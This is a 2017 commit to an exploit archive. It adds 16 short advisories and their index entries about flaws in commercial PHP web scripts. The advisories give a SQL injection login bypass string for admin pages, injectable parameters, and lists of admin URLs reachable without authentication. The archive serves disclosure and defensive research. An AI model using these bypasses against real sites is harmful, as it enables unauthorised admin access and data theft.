DB: 2017-01-15

16 new exploits

My Private Tutor Website Script - Authentication Bypass
Hindu Matrimonial Script - Authentication Bypass
Just Dial Marketplace Script - Authentication Bypass
Entrepreneur Matrimonial Script - Authentication Bypass
Open Source Real-Estate Script - SQL Injection
Inout StickBoard 1.0 Script - Improper Access Restrictions
Inout Search Engine Ultimate Edition 7.0/8.0 Script - Improper Access Restrictions
Inout Webmail Ultimate Edition 4.0 Script - Improper Access Restrictions
Inout SmartDeal 1.0 Script - Improper Access Restrictions
Inout QuerySpace 1.0 Script - Improper Access Restrictions
Inout CareerLamp 1.0 Script - Improper Access Restrictions
Inout SocialTiles 2.0 Script - Improper Access Restrictions
Inout Celebrities 1.0 Script - Improper Access Restrictions
Education Website Script - Authentication Bypass
Professional Service Booking Script - SQL Injection
Courier Business Website Script - Authentication Bypass
This commit is contained in:
Offensive Security 2017-01-15 05:01:17 +00:00
parent 08be47d8e2
commit a577caaebb
17 changed files with 293 additions and 0 deletions

View file

@ -36981,3 +36981,19 @@ id,file,description,date,author,platform,type,port
41037,platforms/php/webapps/41037.txt,"ECommerce-TIBSECART - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0
41038,platforms/php/webapps/41038.txt,"ECommerce-Multi-Vendor Software - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0
41040,platforms/linux/webapps/41040.txt,"Zeroshell 3.6.0/3.7.0 Net Services - Remote Code Execution",2017-01-13,"Ozer Goker",linux,webapps,0
41043,platforms/php/webapps/41043.txt,"My Private Tutor Website Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
41044,platforms/php/webapps/41044.txt,"Hindu Matrimonial Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
41045,platforms/php/webapps/41045.txt,"Just Dial Marketplace Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
41046,platforms/php/webapps/41046.txt,"Entrepreneur Matrimonial Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
41047,platforms/php/webapps/41047.txt,"Open Source Real-Estate Script - SQL Injection",2017-01-13,"Ihsan Sencan",php,webapps,0
41048,platforms/php/webapps/41048.txt,"Inout StickBoard 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
41049,platforms/php/webapps/41049.txt,"Inout Search Engine Ultimate Edition 7.0/8.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
41050,platforms/php/webapps/41050.txt,"Inout Webmail Ultimate Edition 4.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
41051,platforms/php/webapps/41051.txt,"Inout SmartDeal 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
41052,platforms/php/webapps/41052.txt,"Inout QuerySpace 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
41053,platforms/php/webapps/41053.txt,"Inout CareerLamp 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
41054,platforms/php/webapps/41054.txt,"Inout SocialTiles 2.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
41055,platforms/php/webapps/41055.txt,"Inout Celebrities 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
41056,platforms/php/webapps/41056.txt,"Education Website Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
41058,platforms/php/webapps/41058.txt,"Professional Service Booking Script - SQL Injection",2017-01-13,"Ihsan Sencan",php,webapps,0
41059,platforms/php/webapps/41059.txt,"Courier Business Website Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0

Can't render this file because it is too large.

12
platforms/php/webapps/41043.txt Executable file
View file

@ -0,0 +1,12 @@
# # # # #
# Vulnerability: Admin Login Bypass & SQLi
# Date: 13.01.2017
# Vendor Homepage: http://scriptfirm.com/
# Script Name: Professional Service Booking Script
# Script Buy Now: My Private Tutor Website
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
# # # # #

29
platforms/php/webapps/41044.txt Executable file
View file

@ -0,0 +1,29 @@
# # # # #
# Vulnerability:: Admin Login Bypass & SQLi + Add/Edit
# Date: 13.01.2017
# Vendor Homepage: http://www.phpmatrimonialscript.in/
# Script Name: Hindu Matrimonial Script
# Script Buy Now: http://www.phpmatrimonialscript.in/product/hindu-matrimonial-script/
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
#
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
#
# Direct entrance Add/Edit...
# http://localhost/[PATH]/admin/usermanagement.php
# http://localhost/[PATH]/admin/countrymanagement.php
# http://localhost/[PATH]/admin/communitymanagement.php
# http://localhost/[PATH]/admin/renewaldue.php
# http://localhost/[PATH]/admin/generalsettings.php
# http://localhost/[PATH]/admin/cms.php
# http://localhost/[PATH]/admin/cms.php
# http://localhost/[PATH]/admin/newsletter1.php
# http://localhost/[PATH]/admin/payment.php
# http://localhost/[PATH]/admin/searchview.php
# http://localhost/[PATH]/admin/success_story.php
# http://localhost/[PATH]/admin/featured.php
# http://localhost/[PATH]/admin/photo.php
# http://localhost/[PATH]/admin/googleads.php
# http://localhost/[PATH]/admin/reports.php
# # # # #

12
platforms/php/webapps/41045.txt Executable file
View file

@ -0,0 +1,12 @@
# # # # #
# Vulnerability: Admin Login Bypass & SQLi
# Date: 13.01.2017
# Vendor Homepage: http://scriptfirm.com/
# Script Name: Just Dial Marketplace Script
# Script Buy Now: http://scriptfirm.com/just-dial-marketplace
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
# # # # #

12
platforms/php/webapps/41046.txt Executable file
View file

@ -0,0 +1,12 @@
# # # # #
# Vulnerability:: Admin Login Bypass & SQLi
# Date: 13.01.2017
# Vendor Homepage: http://www.phpmatrimonialscript.in/
# Script Name: Entrepreneur Matrimonial Script
# Script Buy Now: http://www.phpmatrimonialscript.in/product/entrepreneur-matrimonial/
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
# # # # #

16
platforms/php/webapps/41047.txt Executable file
View file

@ -0,0 +1,16 @@
# # # # #
# Vulnerability: SQL Injection + Admin Login Bypass
# Date: 13.01.2017
# Vendor Homepage: http://phprealestatescript.org/
# Script Name: Open Source Real-Estate Script
# Script Buy Now: http://phprealestatescript.org/open-source-real-estate-script.html
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/viewpropertydetails.php?id=[SQL]
#
# Admin Login Bypass
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
# # # # #

22
platforms/php/webapps/41048.txt Executable file
View file

@ -0,0 +1,22 @@
# # # # #
# Vulnerability: Security Bypass
# Date: 13.01.2017
# Vendor Homepage: http://www.inoutscripts.com/
# Script Name: Inout StickBoard Script
# Script Version: v1.0
# Script Buy Now: http://www.inoutscripts.com/demo/inout-stickboard/demo/
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Direct entrance Add/Edit/Del...
# An attacker can exploit this issue via a browser.
# The following example URIs are available:
# http://localhost/[PATH]/admin/account/clearcache
# http://localhost/[PATH]/admin/account/changeprofileimage
# http://localhost/[PATH]/admin/account/changepassword
# http://localhost/[PATH]/admin/pin/websitepin
# http://localhost/[PATH]/admin/user/manage
# http://localhost/[PATH]/admin/user/userdetails/69
# Vs.......
# # # # #

21
platforms/php/webapps/41049.txt Executable file
View file

@ -0,0 +1,21 @@
# # # # #
# Vulnerability: Security Bypass
# Date: 13.01.2017
# Vendor Homepage: http://www.inoutscripts.com/
# Script Name: Inout Search Engine Ultimate Edition Script
# Script Version: v7.0, v8.0
# Script Buy Now: http://www.inoutscripts.com/demo/inout-search-engine/demo/
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Direct entrance..
# An attacker can exploit this issue via a browser.
# The following example URIs are available:
# http://localhost/[PATH]/admin/index.php?page=engine/manage_suggestion
# http://localhost/[PATH]/admin/index.php?page=databaseengine/managesettings
# http://localhost/[PATH]/admin/index.php?page=seasonallogo/add
# http://localhost/[PATH]/admin/index.php?page=seasonallogo/manage
# http://localhost/[PATH]/admin/index.php?page=seasonallogo/add
# Vs.......
# # # # #

22
platforms/php/webapps/41050.txt Executable file
View file

@ -0,0 +1,22 @@
# # # # #
# Vulnerability: Security Bypass
# Date: 13.01.2017
# Vendor Homepage: http://www.inoutscripts.com/
# Script Name: Inout Webmail Ultimate Edition v4.0
# Script Version: Ultimate Edition v4.0, Ultimate Hypertable Version
# Script Buy Now: http://www.inoutscripts.com/demo/inout-webmail/demo/
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Direct entrance..
# An attacker can exploit this issue via a browser.
# The following example URIs are available:
# http://localhost/[PATH]/admin/index.php?page=ads/sponsoredlinks
# http://localhost/[PATH]/admin/index.php?page=todolist/todolist
# http://localhost/[PATH]/admin/index.php?page=statistics/registration_showgraph
# http://localhost/[PATH]/admin/index.php?page=statistics/showgraph
# http://localhost/[PATH]/admin/index.php?page=statistics/accountactivity
# http://localhost/[PATH]/admin/index.php?page=calendar/calendar
# Vs.......
# # # # #

19
platforms/php/webapps/41051.txt Executable file
View file

@ -0,0 +1,19 @@
# # # # #
# Vulnerability: Security Bypass
# Date: 13.01.2017
# Vendor Homepage: http://www.inoutscripts.com/
# Script Name: Inout SmartDeal Script
# Script Version: v1.0
# Script Buy Now: http://www.inoutscripts.com/demo/inout-smartdeal/demo/
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Direct entrance..
# An attacker can exploit this issue via a browser.
# The following example URIs are available:
# http://localhost/[PATH]/admin/index.php?page=account/changepassword
# http://localhost/[PATH]/admin/index.php?page=country/addcountry
# http://localhost/[PATH]/admin/index.php?page=account/addbank
# Vs.......
# # # # #

17
platforms/php/webapps/41052.txt Executable file
View file

@ -0,0 +1,17 @@
# # # # #
# Vulnerability: Security Bypass
# Date: 13.01.2017
# Vendor Homepage: http://www.inoutscripts.com/
# Script Name: Inout QuerySpace Script
# Script Version: v1.0
# Script Buy Now: http://www.inoutscripts.com/demo/inout-queryspace/demo/
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Direct entrance..
# An attacker can exploit this issue via a browser.
# The following example URIs are available:
# http://localhost/[PATH]/admin/user/search
# Vs.......
# # # # #

19
platforms/php/webapps/41053.txt Executable file
View file

@ -0,0 +1,19 @@
# # # # #
# Vulnerability: Security Bypass
# Date: 13.01.2017
# Vendor Homepage: http://www.inoutscripts.com/
# Script Name: Inout CareerLamp Script
# Script Version: v1.0
# Script Buy Now: http://www.inoutscripts.com/demo/inout-careerlamp/demo/
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Direct entrance..
# An attacker can exploit this issue via a browser.
# The following example URIs are available:
# http://localhost/[PATH]/admin/statistics/js_registration_showgraph
# http://localhost/[PATH]/admin/statistics/accountactivity
# http://localhost/[PATH]/admin/statistics/js_showgraph
# Vs.......
# # # # #

18
platforms/php/webapps/41054.txt Executable file
View file

@ -0,0 +1,18 @@
# # # # #
# Vulnerability: Security Bypass
# Date: 13.01.2017
# Vendor Homepage: http://www.inoutscripts.com/
# Script Name: Inout SocialTiles Script
# Script Version: v2.0
# Script Buy Now: http://www.inoutscripts.com/demo/inout-socialtiles/demo/
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Direct entrance..
# An attacker can exploit this issue via a browser.
# The following example URIs are available:
# http://localhost/[PATH]/admin/index.php?page=account/statussettings
# http://localhost/[PATH]/admin/index.php?page=account/newad
# Vs.......
# # # # #

18
platforms/php/webapps/41055.txt Executable file
View file

@ -0,0 +1,18 @@
# # # # #
# Vulnerability: Security Bypass
# Date: 13.01.2017
# Vendor Homepage: http://www.inoutscripts.com/
# Script Name: Inout Celebrities Script
# Script Version: v1.0
# Script Buy Now: http://www.inoutscripts.com/demo/inout-celebrities/demo/
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Direct entrance..
# An attacker can exploit this issue via a browser.
# The following example URIs are available:
# http://localhost/[PATH]/admin/settings/managersssettings
# http://localhost/[PATH]/admin/settings/addrsssettings
# Vs.......
# # # # #

12
platforms/php/webapps/41056.txt Executable file
View file

@ -0,0 +1,12 @@
# # # # #
# Vulnerability:: Admin Login Bypass & SQLi
# Date: 13.01.2017
# Vendor Homepage: http://scriptfirm.com/
# Script Name: Education Website Script
# Script Buy Now: http://scriptfirm.com/education-website
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
# # # # #

16
platforms/php/webapps/41058.txt Executable file
View file

@ -0,0 +1,16 @@
# # # # #
# Vulnerability: Admin Login Bypass & SQLi
# Date: 13.01.2017
# Vendor Homepage: http://scriptfirm.com/
# Script Name: Professional Service Booking Script
# Script Buy Now: http://scriptfirm.com/professional-service-booking-engine
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
# SQL Injection/Exploit :
# http://localhost/[PATH]/best_pro_details.php?service_id=[SQL]
# http://localhost/[PATH]/content.php?page=[SQL]
# E.t.c.... Don't look for nothing there are also security vulnerabilities in other files as well.
# # # # #

12
platforms/php/webapps/41059.txt Executable file
View file

@ -0,0 +1,12 @@
# # # # #
# Vulnerability: Admin Login Bypass & SQLi
# Date: 13.01.2017
# Vendor Homepage: http://scriptfirm.com/
# Script Name: Courier Business Website Script
# Script Buy Now: http://scriptfirm.com/courier-business-website
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
# # # # #